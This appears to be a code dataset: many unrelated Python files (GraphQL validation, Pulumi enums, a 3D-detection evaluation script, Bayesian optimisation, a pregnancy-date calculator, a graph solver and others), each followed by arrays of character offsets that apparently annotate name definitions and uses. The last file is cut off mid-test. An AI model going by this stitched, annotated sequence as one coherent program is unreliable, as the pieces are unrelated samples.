PLATFORM_COLLECTOR = PlatformCollector(registry=REGISTRY, namespace=NAMESPACE)
PROCESS_COLLECTOR = ProcessCollector(namespace=NAMESPACE, registry=REGISTRY)
GC_COLLECTOR = GCCollector(registry=REGISTRY, namespace=NAMESPACE)
| [
[
[
30,
47
],
[
453,
470
]
],
[
[
78,
86
],
[
370,
378
],
[
305,
313
],
[
334,
342
],
[
409,
417
]
],
[
[
133,
144
],
[
663,
674
]
],
[
[
197,
214
],
[
513,
530
]
],
[
[
266,
282
],
[
591,
607
]
],
[
[
284,
293
],
[
560,
569
],
[
618,
627
],
[
704,
713
]
],
[
[
442,
450
],
[
540,
548
],
[
638,
646
],
[
684,
692
]
],
[
[
492,
510
]
],
[
[
571,
588
]
],
[
[
648,
660
]
]
] |
from typing import Dict, Optional, Union
from ...error import GraphQLError
from ...language import (
OperationTypeDefinitionNode,
OperationType,
SchemaDefinitionNode,
SchemaExtensionNode,
)
from ...type import GraphQLObjectType
from . import SDLValidationContext, SDLValidationRule
__all__ = ["UniqueOperationTypesRule"]
class UniqueOperationTypesRule(SDLValidationRule):
"""Unique operation types
A GraphQL document is only valid if it has only one type per operation.
"""
def __init__(self, context: SDLValidationContext):
super().__init__(context)
schema = context.schema
self.defined_operation_types: Dict[
OperationType, OperationTypeDefinitionNode
] = {}
self.existing_operation_types: Dict[
OperationType, Optional[GraphQLObjectType]
] = (
{
OperationType.QUERY: schema.query_type,
OperationType.MUTATION: schema.mutation_type,
OperationType.SUBSCRIPTION: schema.subscription_type,
}
if schema
else {}
)
self.schema = schema
def check_operation_types(
self, node: Union[SchemaDefinitionNode, SchemaExtensionNode], *_args
):
for operation_type in node.operation_types or []:
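            # Report an error if the existing schema already provides this operation type,
            # or if this document has already defined it; otherwise record the definition.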
operation = operation_type.operation
already_defined_operation_type = self.defined_operation_types.get(operation)
if self.existing_operation_types.get(operation):
self.report_error(
GraphQLError(
f"Type for {operation.value} already defined in the schema."
" It cannot be redefined.",
operation_type,
)
)
elif already_defined_operation_type:
self.report_error(
GraphQLError(
f"There can be only one {operation.value} type in schema.",
[already_defined_operation_type, operation_type],
)
)
else:
self.defined_operation_types[operation] = operation_type
return self.SKIP
enter_schema_definition = enter_schema_extension = check_operation_types
| [
[
[
19,
23
],
[
667,
671
],
[
782,
786
]
],
[
[
25,
33
],
[
815,
823
]
],
[
[
35,
40
],
[
1206,
1211
]
],
[
[
63,
75
],
[
1583,
1595
],
[
1918,
1930
]
],
[
[
106,
133
],
[
700,
727
]
],
[
[
139,
152
],
[
685,
698
],
[
887,
900
],
[
943,
956
],
[
1005,
1018
],
[
800,
813
]
],
[
[
158,
178
],
[
1212,
1232
]
],
[
[
184,
203
],
[
1234,
1253
]
],
[
[
227,
244
],
[
824,
841
]
],
[
[
259,
279
],
[
540,
560
]
],
[
[
281,
298
],
[
372,
389
]
],
[
[
300,
307
]
],
[
[
347,
371
]
]
] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'CostAllocationPolicyType',
'CostAllocationResourceType',
'RuleStatus',
]
class CostAllocationPolicyType(str, Enum):
"""
Method of cost allocation for the rule
"""
FIXED_PROPORTION = "FixedProportion"
class CostAllocationResourceType(str, Enum):
"""
Type of resources contained in this cost allocation rule
"""
DIMENSION = "Dimension"
TAG = "Tag"
class RuleStatus(str, Enum):
"""
Status of the rule
"""
NOT_ACTIVE = "NotActive"
ACTIVE = "Active"
PROCESSING = "Processing"
| [
[
[
186,
190
],
[
328,
332
],
[
475,
479
],
[
627,
631
]
],
[
[
192,
199
]
],
[
[
298,
322
]
],
[
[
443,
469
]
],
[
[
611,
621
]
]
] |
import os
import numpy as np
import torch
import torch.nn.functional as F
from lib.utils.bbox_transform import decode_bbox_target
from tools.kitti_object_eval_python.evaluate import evaluate as kitti_evaluate
from lib.config import cfg
import lib.utils.kitti_utils as kitti_utils
import lib.utils.iou3d.iou3d_utils as iou3d_utils
from datetime import datetime
from tensorboardX import SummaryWriter
import tqdm
np.random.seed(1024) # set the same seed
def save_kitti_format(sample_id, calib, bbox3d, kitti_output_dir, scores, img_shape):
corners3d = kitti_utils.boxes3d_to_corners3d(bbox3d)
img_boxes, _ = calib.corners3d_to_img_boxes(corners3d)
img_boxes[:, 0] = np.clip(img_boxes[:, 0], 0, img_shape[1] - 1)
img_boxes[:, 1] = np.clip(img_boxes[:, 1], 0, img_shape[0] - 1)
img_boxes[:, 2] = np.clip(img_boxes[:, 2], 0, img_shape[1] - 1)
img_boxes[:, 3] = np.clip(img_boxes[:, 3], 0, img_shape[0] - 1)
img_boxes_w = img_boxes[:, 2] - img_boxes[:, 0]
img_boxes_h = img_boxes[:, 3] - img_boxes[:, 1]
box_valid_mask = np.logical_and(
img_boxes_w < img_shape[1] * 0.8, img_boxes_h < img_shape[0] * 0.8)
kitti_output_file = os.path.join(kitti_output_dir, '%06d.txt' % sample_id)
with open(kitti_output_file, 'w') as f:
for k in range(bbox3d.shape[0]):
if box_valid_mask[k] == 0:
continue
x, z, ry = bbox3d[k, 0], bbox3d[k, 2], bbox3d[k, 6]
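            # derive the observation angle alpha written into the KITTI-format label below
            # from the ray angle beta and the heading ry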
beta = np.arctan2(z, x)
alpha = -np.sign(beta) * np.pi / 2 + beta + ry
print('%s -1 -1 %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f' %
(cfg.CLASSES, alpha, img_boxes[k, 0], img_boxes[k, 1], img_boxes[k, 2], img_boxes[k, 3],
bbox3d[k, 3], bbox3d[k, 4], bbox3d[k,
5], bbox3d[k, 0], bbox3d[k, 1], bbox3d[k, 2],
bbox3d[k, 6], scores[k]), file=f)
def eval_one_epoch_joint(model, dataloader, epoch_id, result_dir):
# print("-----------------joint____________________________*******")
np.random.seed(666)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if True:
# print("------------save_result__________________*******")
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
rpn_output_dir = os.path.join(result_dir, 'rpn_result', 'data')
os.makedirs(rpn_output_dir, exist_ok=True)
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = total_rpn_iou = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
cnt += 1
calib = data['calib']
sample_id, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
batch_size = len(sample_id)
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs, 'calib': calib}
# model inference
ret_dict = model(input_data)
        print(ret_dict.keys())
roi_scores_raw = ret_dict['roi_scores_raw'] # (B, M)
roi_boxes3d = ret_dict['rois'] # (B, M, 7)
seg_result = ret_dict['seg_result'].long() # (B, N)
rcnn_cls = ret_dict['rcnn_cls'].view(
batch_size, -1, ret_dict['rcnn_cls'].shape[1])
rcnn_reg = ret_dict['rcnn_reg'].view(
batch_size, -1, ret_dict['rcnn_reg'].shape[1]) # (B, M, C)
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
assert False
pred_boxes3d = decode_bbox_target(roi_boxes3d.view(-1, 7), rcnn_reg.view(-1, rcnn_reg.shape[-1]),
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True).view(batch_size, -1, 7)
# scoring
if rcnn_cls.shape[2] == 1:
raw_scores = rcnn_cls # (B, M, 1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
recalled_num = gt_num = rpn_iou = 0
if not False:
if not cfg.RPN.FIXED:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
rpn_cls_label = torch.from_numpy(
rpn_cls_label).cuda(non_blocking=True).long()
gt_boxes3d = data['gt_boxes3d']
for k in range(batch_size):
# calculate recall
cur_gt_boxes3d = gt_boxes3d[k]
tmp_idx = cur_gt_boxes3d.__len__() - 1
while tmp_idx >= 0 and cur_gt_boxes3d[tmp_idx].sum() == 0:
tmp_idx -= 1
if tmp_idx >= 0:
cur_gt_boxes3d = cur_gt_boxes3d[:tmp_idx + 1]
cur_gt_boxes3d = torch.from_numpy(
cur_gt_boxes3d).cuda(non_blocking=True).float()
iou3d = iou3d_utils.boxes_iou3d_gpu(
pred_boxes3d[k], cur_gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (
gt_max_iou > thresh).sum().item()
recalled_num += (gt_max_iou > 0.7).sum().item()
gt_num += cur_gt_boxes3d.shape[0]
total_gt_bbox += cur_gt_boxes3d.shape[0]
# original recall
iou3d_in = iou3d_utils.boxes_iou3d_gpu(
roi_boxes3d[k], cur_gt_boxes3d)
gt_max_iou_in, _ = iou3d_in.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_roi_recalled_bbox_list[idx] += (
gt_max_iou_in > thresh).sum().item()
if not cfg.RPN.FIXED:
fg_mask = rpn_cls_label > 0
correct = ((seg_result == rpn_cls_label)
& fg_mask).sum().float()
union = fg_mask.sum().float() + (seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
total_rpn_iou += rpn_iou.item()
disp_dict = {
'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
if True:
# save roi and refine results
roi_boxes3d_np = roi_boxes3d.cpu().numpy()
pred_boxes3d_np = pred_boxes3d.cpu().numpy()
roi_scores_raw_np = roi_scores_raw.cpu().numpy()
raw_scores_np = raw_scores.cpu().numpy()
rpn_cls_np = ret_dict['rpn_cls'].cpu().numpy()
rpn_xyz_np = ret_dict['backbone_xyz'].cpu().numpy()
seg_result_np = seg_result.cpu().numpy()
output_data = np.concatenate((rpn_xyz_np, rpn_cls_np.reshape(batch_size, -1, 1),
seg_result_np.reshape(batch_size, -1, 1)), axis=2)
for k in range(batch_size):
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, roi_boxes3d_np[k], roi_output_dir,
roi_scores_raw_np[k], image_shape)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_np[k], refine_output_dir,
raw_scores_np[k], image_shape)
output_file = os.path.join(
rpn_output_dir, '%06d.npy' % cur_sample_id)
np.save(output_file, output_data.astype(np.float32))
# scores thresh
inds = norm_scores > cfg.RCNN.SCORE_THRESH
for k in range(batch_size):
cur_inds = inds[k].view(-1)
if cur_inds.sum() == 0:
continue
pred_boxes3d_selected = pred_boxes3d[k, cur_inds]
raw_scores_selected = raw_scores[k, cur_inds]
norm_scores_selected = norm_scores[k, cur_inds]
# NMS thresh
# rotated nms
boxes_bev_selected = kitti_utils.boxes3d_to_bev_torch(
pred_boxes3d_selected)
keep_idx = iou3d_utils.nms_gpu(
boxes_bev_selected, raw_scores_selected, cfg.RCNN.NMS_THRESH).view(-1)
pred_boxes3d_selected = pred_boxes3d_selected[keep_idx]
scores_selected = raw_scores_selected[keep_idx]
pred_boxes3d_selected, scores_selected = pred_boxes3d_selected.cpu(
).numpy(), scores_selected.cpu().numpy()
cur_sample_id = sample_id[k]
calib = dataset.get_calib(cur_sample_id)
final_total += pred_boxes3d_selected.shape[0]
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, pred_boxes3d_selected,
final_output_dir, scores_selected, image_shape)
progress_bar.close()
# dump empty files
split_file = os.path.join(dataset.imageset_dir,
'..', '..', 'ImageSets', dataset.split + '.txt')
split_file = os.path.abspath(split_file)
image_idx_list = [x.strip() for x in open(split_file).readlines()]
empty_cnt = 0
for k in range(image_idx_list.__len__()):
cur_file = os.path.join(final_output_dir, '%s.txt' % image_idx_list[k])
if not os.path.exists(cur_file):
with open(cur_file, 'w') as temp_f:
pass
empty_cnt += 1
ret_dict = {'empty_cnt': empty_cnt}
avg_rpn_iou = (total_rpn_iou / max(cnt, 1.0))
avg_cls_acc = (total_cls_acc / max(cnt, 1.0))
avg_cls_acc_refined = (total_cls_acc_refined / max(cnt, 1.0))
avg_det_num = (final_total / max(len(dataset), 1.0))
ret_dict['rpn_iou'] = avg_rpn_iou
ret_dict['rcnn_cls_acc'] = avg_cls_acc
ret_dict['rcnn_cls_acc_refined'] = avg_cls_acc_refined
ret_dict['rcnn_avg_num'] = avg_det_num
for idx, thresh in enumerate(thresh_list):
cur_roi_recall = total_roi_recalled_bbox_list[idx] / max(
total_gt_bbox, 1.0)
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_roi_recall
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
ret_dict['rcnn_recall(thresh=%.2f)' % thresh] = cur_recall
if cfg.TEST.SPLIT != 'test':
name_to_class = {'Car': 0, 'Pedestrian': 1, 'Cyclist': 2}
ap_result_str, ap_dict = kitti_evaluate(dataset.label_dir, final_output_dir, label_split_file=split_file,
current_class=name_to_class[cfg.CLASSES])
ret_dict.update(ap_dict)
return ap_result_str
| [
[
[
7,
9
],
[
1175,
1177
],
[
2222,
2224
],
[
2275,
2277
],
[
2427,
2429
],
[
2502,
2504
],
[
2577,
2579
],
[
2632,
2634
],
[
2683,
2685
],
[
2734,
2736
],
[
9026,
9028
],
[
10555,
10557
],
[
10686,
10688
],
[
10868,
10870
],
[
10944,
10946
]
],
[
[
17,
28
],
[
413,
415
],
[
682,
684
],
[
750,
752
],
[
818,
820
],
[
886,
888
],
[
1058,
1060
],
[
1462,
1464
],
[
1500,
1502
],
[
1516,
1518
],
[
2098,
2100
],
[
8303,
8305
],
[
9120,
9122
],
[
9160,
9162
]
],
[
[
36,
41
],
[
2134,
2139
],
[
3410,
3415
],
[
4978,
4983
],
[
5117,
5122
],
[
5569,
5574
],
[
6123,
6128
],
[
7545,
7550
]
],
[
[
49,
73
],
[
5186,
5187
]
],
[
[
111,
129
],
[
4176,
4194
]
],
[
[
182,
208
],
[
12058,
12072
]
],
[
[
233,
236
],
[
1654,
1657
],
[
2151,
2154
],
[
4101,
4104
],
[
4378,
4381
],
[
4453,
4456
],
[
4531,
4534
],
[
4627,
4630
],
[
4704,
4707
],
[
4741,
4744
],
[
5046,
5049
],
[
5430,
5433
],
[
7232,
7235
],
[
9227,
9230
],
[
9827,
9830
],
[
11933,
11936
],
[
12215,
12218
]
],
[
[
244,
280
],
[
559,
570
],
[
9653,
9664
]
],
[
[
288,
330
],
[
6241,
6252
],
[
6872,
6883
],
[
9749,
9760
]
],
[
[
352,
360
]
],
[
[
386,
399
]
],
[
[
407,
411
],
[
3078,
3082
]
],
[
[
461,
478
],
[
8691,
8708
],
[
8851,
8868
],
[
10348,
10365
]
],
[
[
1958,
1978
]
]
] |
from math import log10
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import Matern
import numpy as np
from .utils import create_rng
class BO:
"""
Bayesian Optimization framework
"""
def __init__(self, k, hidden_dim=(100, 10000),
spectral_radius=(.9, 1.3), p=(0, 1),
alpha=(0, 1), beta=(1e-5, 1e3), random_state=None):
"""
Parameters
----------
k : tuple
Range of values for nearest neighbors in small-world network
hidden_dim : tuple, optional
Range values for the number of nodes in the reservoir
spectral_radius : tuple, optional
Range of values for the spectral radius for the reservoir
p : tuple, optional
Range of values to consider for the rewire probability
alpha : tuple, optional
Range of values for the leaking rate
beta : tuple, optional
Range of values for the L2 regression regularization
random_state : int or np.random.RandomState, optional
Random state initializer
"""
# Check that all the hyper-parameters are tuples with two entries
# which define the lower and upper bounds for the search space
hyper_params = [k, hidden_dim, spectral_radius, p, alpha, beta]
for param in hyper_params:
assert isinstance(param, tuple), "{} must be a tuple".format(param)
assert len(param) == 2, "{} must have two arguments; the upper" \
"and lower bound".format(param)
self.lwr_k = k[0]
self.upr_k = k[1]
self.lwr_hidden_dim = hidden_dim[0]
self.upr_hidden_dim = hidden_dim[1]
self.lwr_spectral_radius = spectral_radius[0]
self.upr_spectral_radius = spectral_radius[1]
self.lwr_p = p[0]
self.upr_p = p[1]
self.lwr_alpha = alpha[0]
self.upr_alpha = alpha[1]
self.lwr_beta = beta[0]
self.upr_beta = beta[1]
self.rng = create_rng(random_state)
self.gpr = GaussianProcessRegressor(kernel=Matern(),
random_state=self.rng)
# We need a placeholder for different hyper-parameter values that
# arrive and the corresponding error values
self.H = []
self.y = []
def update_gpr(self, X, y):
"""
Updates the Gaussian process with new data and error value
        Appends X to `H`, the list of hyper-parameter values tried against the
        true function, appends the resulting model error to `y`, and refits the
        Gaussian process on the accumulated data.
Parameters
----------
X : list
Hyper-parameter values that were tried
y : float
Error that resulted from using X on the true function
Returns
-------
None
"""
self.H.append(X)
self.y.append(y)
self.gpr.fit(self.H, self.y)
def _sample_uniformly(self, num_samples, lwr_bound, upr_bound):
"""
Samples uniformly from a non-uniform space
Parameters
----------
num_samples : int
Number of samples to generate
lwr_bound : float
Hyper-parameter lower bound
upr_bound : float
Hyper-parameter upper bound
Returns
-------
param_vals : np.ndarray
Uniformly sampled hyper-parameter values
"""
        # To sample the range evenly on a log scale, convert the bounds to base-ten
        # exponents, sample uniformly between those exponents, and raise 10 to the
        # sampled values.
new_lwr_bound = log10(lwr_bound)
new_upr_bound = log10(upr_bound)
samples = self.rng.uniform(low=new_lwr_bound, high=new_upr_bound,
size=(num_samples, 1))
param_vals = np.power(10, samples)
return param_vals
def _build_options(self, num_samples=1000):
"""
Builds matrix which defines possible options for this iteration
Parameters
----------
num_samples : int, optional
Number of hyper-parameter samples to generate
Returns
-------
H_space : np.ndarray
Matrix of options for the ESN hyper-parameters
"""
k_vals = self.rng.randint(low=self.lwr_k, high=self.upr_k,
size=(num_samples, 1), dtype=np.int32)
hidden_dim_vals = self.rng.randint(low=self.lwr_hidden_dim,
high=self.upr_hidden_dim,
size=(num_samples, 1),
dtype=np.int32)
spectral_radius_vals = self.rng.uniform(low=self.lwr_spectral_radius,
high=self.upr_spectral_radius,
size=(num_samples, 1))
p_vals = self.rng.uniform(low=self.lwr_p, high=self.upr_p,
size=(num_samples, 1))
alpha_vals = self.rng.uniform(low=self.lwr_alpha, high=self.upr_alpha,
size=(num_samples, 1))
beta_vals = self._sample_uniformly(num_samples, self.lwr_beta,
self.upr_beta)
H_space = np.concatenate([k_vals, hidden_dim_vals,
spectral_radius_vals, p_vals, alpha_vals,
beta_vals], axis=1)
return H_space
def find_best_choices(self, num_samples=1000, num_choices=1):
"""
Finds the best hyper-parameter combination
Parameters
----------
num_samples : int, optional
Number of hyper-parameter samples to generate
num_choices : int, optional
Number of choices to select
Returns
-------
param_vals : dict
Best hyper-parameter values for the current Gaussian process
"""
H_space = self._build_options(num_samples)
        # On the first MPI iteration there is no prior, so randomly sample
        # num_choices points instead of querying the Gaussian process
if num_choices > 1:
idx = self.rng.choice(np.arange(num_samples), size=num_choices,
replace=False)
best_vals = H_space[idx, :]
else:
y_pred = self.gpr.sample_y(H_space, random_state=self.rng)
choices = np.argmin(y_pred)
best_vals = H_space[choices, :]
hyper_parameters = ['k', 'hidden_dim', 'spectral_radius', 'p', 'alpha',
'beta']
param_vals = {}
for (i, val) in enumerate(hyper_parameters):
if num_choices == 1:
param_vals[val] = best_vals[i]
if (val == 'k') or (val == 'hidden_dim'):
param_vals[val] = int(param_vals[val])
else:
param_vals[val] = best_vals[:, i]
if (val == 'k') or (val == 'hidden_dim'):
param_vals[val] = param_vals[val].astype(int)
return param_vals
def return_best_parameters(self):
min_error = min(self.y)
index = self.y.index(min_error)
print("Minimum Validation Error = ", min_error)
print("Best parameters found = ", self.H[index])
return min_error, self.H[index]
| [
[
[
17,
22
],
[
3747,
3752
],
[
3788,
3793
]
],
[
[
60,
84
],
[
2140,
2164
]
],
[
[
130,
136
],
[
2172,
2178
]
],
[
[
144,
155
],
[
3958,
3960
],
[
4536,
4538
],
[
4799,
4801
],
[
5453,
5455
],
[
6355,
6357
],
[
6593,
6595
]
],
[
[
175,
185
],
[
2096,
2106
]
],
[
[
194,
196
]
]
] |
# coding=utf-8
# Copyright 2022 The Deeplab2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of model exports for axial_resnet_instances."""
import os
from absl import flags
from absl.testing import parameterized
import tensorflow as tf
from deeplab2.model.encoder import axial_resnet_instances
FLAGS = flags.FLAGS
class ModelExportTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters(
('resnet50',),
('resnet50_beta',),
('max_deeplab_s_backbone',),
('max_deeplab_l_backbone',),
('axial_resnet_s',),
('axial_resnet_l',),
('axial_deeplab_s',),
('axial_deeplab_l',),
('swidernet',),
('axial_swidernet',),
)
def test_model_export(self, model_name):
model = axial_resnet_instances.get_model(
model_name,
output_stride=16,
backbone_layer_multiplier=1.0,
bn_layer=tf.keras.layers.BatchNormalization,
conv_kernel_weight_decay=0.0001,
# Test with small models only.
num_blocks=[2, 2, 2, 2],
# Disable drop path as it is not compatible with model exporting.
block_group_config={'drop_path_keep_prob': 1.0})
model(tf.keras.Input([257, 257, 3], batch_size=1), training=False)
export_dir = os.path.join(
FLAGS.test_tmpdir, 'test_model_export', model_name)
model.save(export_dir)
if __name__ == '__main__':
tf.test.main()
| [
[
[
666,
668
],
[
1777,
1779
]
],
[
[
687,
692
],
[
824,
829
]
],
[
[
718,
731
],
[
878,
891
],
[
907,
920
]
],
[
[
739,
755
],
[
860,
862
],
[
1909,
1911
],
[
1409,
1411
],
[
1699,
1701
]
],
[
[
792,
814
],
[
1273,
1295
]
],
[
[
816,
821
],
[
1799,
1804
]
],
[
[
844,
859
]
]
] |
from rip_pages import rip_pages
from read_pages import read_pages
from format_csv import format_csv
# STEP 1: CONFIG VARIABLES
SOURCE_DOC = '114sdoc7'
FILE_NAME = "GPO-CDOC-" + SOURCE_DOC + ".pdf"
OUT_FILE = 'senate_data.csv'
MISSING_FILE = 'missing_data.json'
START_PAGE = 17
END_PAGE = 2259
# STEP 2: Rip text, read pages, format output
rip_pages(FILE_NAME, START_PAGE, END_PAGE)
read_pages(START_PAGE, END_PAGE, OUT_FILE, MISSING_FILE)
format_csv(SOURCE_DOC, OUT_FILE)
# STEP 3: Reconcile data in MISSING_FILE
| [
[
[
22,
31
],
[
341,
350
]
],
[
[
55,
65
],
[
384,
394
]
],
[
[
89,
99
],
[
441,
451
]
],
[
[
128,
138
],
[
178,
188
],
[
452,
462
]
],
[
[
152,
161
],
[
351,
360
]
],
[
[
198,
206
],
[
417,
425
],
[
464,
472
]
],
[
[
227,
239
],
[
427,
439
]
],
[
[
262,
272
],
[
362,
372
],
[
395,
405
]
],
[
[
278,
286
],
[
374,
382
],
[
407,
415
]
]
] |
my_list = [1, 2, 2, 4, 6]
#print reverse
print(my_list[::-1])
student = {'user': 'Lubo',
'pass': 'admin',
'course': ['C# Fundamentals', 'C# ASP', 'Algorithms']}
for key in student:
print(key)
for kvp in student.items():
print(f'the key is: {kvp[0]}, and values are: {kvp[1]} ')
print(student['pass'])
print(student.get('Pass', 'Sorry mate no such key'))
if 'pass' in student.keys():
print('Here')
else:
print('Not here')
second_part_student = {
'age': 25
}
student.update(second_part_student)
print(student)
| [
[
[
0,
7
],
[
47,
54
]
],
[
[
63,
70
],
[
196,
203
],
[
232,
239
],
[
319,
326
],
[
342,
349
],
[
403,
410
],
[
506,
513
],
[
548,
555
]
],
[
[
189,
192
],
[
215,
218
]
],
[
[
225,
228
],
[
274,
277
],
[
300,
303
]
],
[
[
466,
485
],
[
521,
540
]
]
] |
import datetime
from dateutil.relativedelta import relativedelta
print("Programa para calcular o prazo de exame de ultrassom...\nO mesmo deve ser feito entre 22 e 24 semanas de gestação")
print("você deverá informar com quantas semanasa de gestação a paciente se encontra, no formato aaaa/mm/dd")
semanas = int(input("Com quantas semanas de gestação a paciente se encontra hoje? "))
exameInicio = 22-semanas
exameFinal = 24 - semanas
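# Add the remaining weeks to today's date to get the start and end of the exam window.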
morfologicoInicio = datetime.date.today()+ relativedelta(weeks=exameInicio)
morfologicoFinal = datetime.date.today() + relativedelta(weeks=exameFinal)
dfinal = morfologicoFinal.strftime('%d/%m/%Y')
dinicial = morfologicoInicio.strftime('%d/%m/%Y')
print("O exame deverá ser feito entre ",dinicial, " e ", dfinal) | [
[
[
7,
15
],
[
456,
464
],
[
531,
539
]
],
[
[
51,
64
],
[
479,
492
],
[
555,
568
]
],
[
[
298,
305
],
[
401,
408
],
[
427,
434
]
],
[
[
384,
395
],
[
499,
510
]
],
[
[
409,
419
],
[
575,
585
]
],
[
[
436,
453
],
[
645,
662
]
],
[
[
512,
528
],
[
596,
612
]
],
[
[
587,
593
],
[
742,
748
]
],
[
[
634,
642
],
[
725,
733
]
]
] |
from __future__ import annotations
from typing import Generator, NoReturn
class StdReader:
def __init__(
self,
) -> NoReturn:
import sys
self.buf = sys.stdin.buffer
self.lines = self.async_readlines()
self.chunks: Generator
def async_readlines(
self,
) -> Generator:
while True:
gen = self.line_chunks()
yield gen
def line_chunks(
self,
) -> Generator:
ln = self.buf.readline()
for chunk in ln.split():
yield chunk
def __call__(
self,
) -> bytes:
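        # Return the next whitespace-separated token, advancing to a new input line
        # when the current one is exhausted.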
try:
chunk = next(self.chunks)
except:
self.chunks = next(
self.lines,
)
chunk = self()
return chunk
def str(
self,
) -> str:
b = self()
return b.decode()
def int(
self,
) -> int:
return int(self.str())
from abc import ABC, abstractmethod
class Solver(ABC):
def __init__(self):
self.reader = StdReader()
def __call__(
self,
):
self.prepare()
self.solve()
@abstractmethod
def prepare(self):
...
@abstractmethod
def solve(self):
...
import numpy as np
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import floyd_warshall
class Problem(
Solver,
):
def prepare(self):
reader = self.reader
n = reader.int()
m = reader.int()
a = [reader.int() for _ in range(3 * m)]
a = np.array(
a,
).reshape(m, 3)
a, b, t = a.T
self.n, self.m = n, m
self.a = a - 1
self.b = b - 1
self.t = t
def solve(self):
self.compute_dist_mat()
dist = self.dist
d = dist.max(axis=1).min()
print(int(d))
def compute_dist_mat(
self,
):
n = self.n
a = self.a
b = self.b
t = self.t
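        # Build a sparse weighted adjacency matrix from the edge list and run
        # all-pairs shortest paths (undirected Floyd-Warshall).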
g = csr_matrix(
(t, (a, b)),
shape=(n, n),
)
dist = floyd_warshall(
csgraph=g,
directed=False,
)
self.dist = dist
def main():
t = 1
# t = StdReader().int()
for _ in range(t):
Problem()()
if __name__ == "__main__":
main()
| [
[
[
23,
34
]
],
[
[
55,
64
],
[
266,
275
],
[
325,
334
],
[
460,
469
]
],
[
[
66,
74
],
[
135,
143
]
],
[
[
83,
92
],
[
1064,
1073
]
],
[
[
977,
980
],
[
1012,
1015
]
],
[
[
982,
996
],
[
1166,
1180
],
[
1222,
1236
]
],
[
[
1005,
1011
],
[
1396,
1402
]
],
[
[
1279,
1290
],
[
1570,
1572
]
],
[
[
1316,
1326
],
[
2008,
2018
]
],
[
[
1360,
1374
],
[
2096,
2110
]
],
[
[
1383,
1390
],
[
2281,
2288
]
],
[
[
2204,
2208
],
[
2326,
2330
]
]
] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Tests for the astropylibrarian.reducers.utils module.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
from astropylibrarian.reducers.utils import iter_sphinx_sections
if TYPE_CHECKING:
from .conftest import HtmlTestData
def test_iter_sphinx_sections(color_excess_tutorial: HtmlTestData) -> None:
"""Test the iter_sphinx_sections algorithm using the color-excess.html
notebook tutorial example.
This example is made complicated by the fact that the heading levels are
not strictly hierarchical. There are multiple "h1" tags.
"""
doc = color_excess_tutorial.parse()
root = doc.cssselect(".card .section")[0]
sections = []
for s in iter_sphinx_sections(
root_section=root,
base_url=color_excess_tutorial.url,
headers=[],
header_callback=lambda x: x.rstrip("¶"),
content_callback=lambda x: x.strip(),
):
sections.append(s)
assert len(sections) == 5
assert sections[0].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Learning Goals",
]
assert sections[0].header_level == 2
assert sections[0].url == (
"http://learn.astropy.org/rst-tutorials/color-excess.html"
"#learning-goals"
